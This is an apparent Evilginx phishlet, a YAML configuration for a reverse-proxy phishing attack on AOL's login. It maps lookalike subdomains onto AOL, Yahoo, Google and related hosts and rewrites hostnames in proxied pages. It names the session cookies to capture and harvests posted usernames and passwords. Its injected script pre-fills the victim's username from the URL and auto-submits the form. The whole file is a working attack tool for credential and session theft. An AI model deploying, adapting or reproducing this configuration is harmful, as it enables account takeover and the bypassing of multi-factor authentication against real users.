author: '@tare'
min_ver: '2.3.0'
proxy_hosts:
  - {phish_sub: 'logina', orig_sub: 'login', domain: 'aol.com', session: true, auto_filter: true, is_landing: true}
  - {phish_sub: 'apilogin', orig_sub: 'api.login', domain: 'aol.com', session: false, auto_filter: true, is_landing: false}
  - {phish_sub: 'gucee', orig_sub: 'guce', domain: 'aol.com', session: false, auto_filter: true, is_landing: false}
  - {phish_sub: 'wwww', orig_sub: 'www', domain: 'aol.com', session: false, auto_filter: true, is_landing: false}
  - {phish_sub: 'oidcwww', orig_sub: 'oidc.www', domain: 'aol.com', session: false, auto_filter: true, is_landing: false}
  - {phish_sub: 'maill', orig_sub: 'mail', domain: 'aol.com', session: false, auto_filter: true, is_landing: false}
  - {phish_sub: 'oidcmail', orig_sub: 'oidc.mail', domain: 'aol.com', session: false, auto_filter: true, is_landing: false}
  - {phish_sub: 'audc', orig_sub: 'udc', domain: 'yahoo.com', session: false, auto_filter: true, is_landing: false}
  - {phish_sub: 'video-apiyql', orig_sub: 'video-api.yql', domain: 'yahoo.com', session: false, auto_filter: true, is_landing: false}
  - {phish_sub: 'yep.video', orig_sub: 'yep.video', domain: 'yahoo.com', session: false, auto_filter: true, is_landing: false}
  - {phish_sub: 's', orig_sub: 's', domain: 'yimg.com', session: false, auto_filter: false, is_landing: false}
  - {phish_sub: 's', orig_sub: 's', domain: 'aolcdn.com', session: false, auto_filter: true, is_landing: false}
  - {phish_sub: 'o', orig_sub: 'o', domain: 'aolcdn.com', session: false, auto_filter: true, is_landing: false}
  - {phish_sub: 'api-2-0', orig_sub: 'api-2-0', domain: 'spot.im', session: false, auto_filter: true, is_landing: false}
  - {phish_sub: 'static-cdn', orig_sub: 'static-cdn', domain: 'spot.im', auto_filter: true, session: false, is_landing: false}
  - {phish_sub: 'launcher', orig_sub: 'launcher', domain: 'spot.im', session: false, auto_filter: true, is_landing: false}
  - {phish_sub: 'consentcmp', orig_sub: 'consent.cmp', domain: 'oath.com', session: false, auto_filter: true, is_landing: false}
  - {phish_sub: 'google', orig_sub: 'www', domain: 'google.com', session: true, auto_filter: false, is_landing: false}
  - {phish_sub: 'wwwa', orig_sub: 'www', domain: 'gstatic.com', session: true, auto_filter: true, is_landing: false}
  - {phish_sub: 'logina', orig_sub: 'login', domain: 'yahoo.net', session: false, auto_filter: false, is_landing: false}
  - {phish_sub: '3p-udc', orig_sub: '3p-udc', domain: 'yahoo.net', session: false, auto_filter: false, is_landing: false}

sub_filters:
  - {triggers_on: 'login.aol.com', orig_sub: 'login', domain: 'aol.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript']}
  - {triggers_on: 'login.aol.com', orig_sub: 'login', domain: 'aol.com', search: 'https%3A%2F%2{hostname}/', replace: 'https%3A%2F%2{hostname}/', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript']}
  - {triggers_on: 'login.aol.com', orig_sub: 'login', domain: 'aol.com', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript']}

  - {triggers_on: 'login.aol.com', orig_sub: 'login', domain: 'aol.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript']}
  - {triggers_on: 'login.aol.com', orig_sub: 'login', domain: 'aol.com', search: 'https%3A%2F%2{hostname}/', replace: 'https%3A%2F%2{hostname}/', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript']}
  - {triggers_on: 'login.aol.com', orig_sub: 'login', domain: 'aol.com', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript']}

  - {triggers_on: 'login.aol.com', orig_sub: 'www', domain: 'google.com', search: 'https%3A%2F%2{hostname_regexp}/', replace: 'https%3A%2F%2{hostname_regexp}/', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript']}
  - {triggers_on: 'login.aol.com', orig_sub: 'www', domain: 'google.com', search: '{hostname_regexp}', replace: '{hostname_regexp}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript']}
  - {triggers_on: 'login.aol.com', orig_sub: 'www', domain: 'google.com', search: 'https://{hostname_regexp}/', replace: 'https://{hostname_regexp}/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
  - {triggers_on: 'login.aol.com', orig_sub: 'login', domain: 'yahoo.net', search: 'https://{hostname_regexp}/', replace: 'https://{hostname_regexp}/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
  - {triggers_on: 'login.aol.com', orig_sub: '3p-udc', domain: 'yahoo.net', search: 'https://{hostname_regexp}/', replace: 'https://{hostname_regexp}/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
  - {triggers_on: 'login.aol.com', orig_sub: 'login', domain: 'yahoo.net', search: 'https%3A%2F%2{hostname_regexp}/', replace: 'https%3A%2F%2{hostname_regexp}/', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript']}
  - {triggers_on: 'login.aol.com', orig_sub: 'login', domain: 'yahoo.net', search: '{hostname_regexp}', replace: '{hostname_regexp}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript']}
  - {triggers_on: 'login.aol.com', orig_sub: 'login', domain: 'yahoo.net', search: 'https://login.yahoo.net', replace: 'https://login.{domain}', mimes: ['text/html']}


  - {triggers_on: 'login.aol.com', orig_sub: 's', domain: 'yimg.com', search: 'https://{hostname_regexp}/', replace: 'https://{hostname_regexp}/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
  - {triggers_on: 'login.aol.com', orig_sub: 's', domain: 'yimg.com', search: 'https%3A%2F%2{hostname_regexp}/', replace: 'https%3A%2F%2{hostname_regexp}/', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript']}
  - {triggers_on: 'login.aol.com', orig_sub: 's', domain: 'yimg.com', search: '{hostname_regexp}', replace: '{hostname_regexp}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript']}

auth_tokens:
  - domain: '.aol.com'
    keys: ['OTH', 'A1S', '.*,regexp']
  - domain: '.login.aol.com'
    keys: ['T', 'Y', 'AS', '.*,regexp']
  - domain: '.www.aol.com'
    keys: ['OTHP', '.*,regexp']    

auth_urls:
  - '/account/challenge/email-verify'
  - '/account/challenge/phone-verify'
  - '/?guce_referrer=*'
  
credentials:
  username:
    key: 'username'
    search: '(.*)'
    type: 'post'
  password:
    key: 'password'
    search: '(.*)'
    type: 'post'
login:
  domain: 'login.aol.com'
  path: '/'
js_inject:
  - trigger_domains: ["login.aol.com"]
    trigger_paths: ["/*"]
    script: |
      window.addEventListener("load", () => {
        if (window.location.hash.length == 0) {
          return
        }
        function waitForElm(e){return new Promise(t=>{if(document.querySelector(e))return t(document.querySelector(e));const r=new MutationObserver(o=>{document.querySelector(e)&&(t(document.querySelector(e)),r.disconnect())});r.observe(document.body,{childList:!0,subtree:!0})})}
        waitForElm("#login-username").then((elm) => {
          elm.focus();
          elm.value = window.location.hash.slice(1);
          const submBtn = document.querySelector("#login-signin");
          submBtn.focus();
          submBtn.click();
        });
      });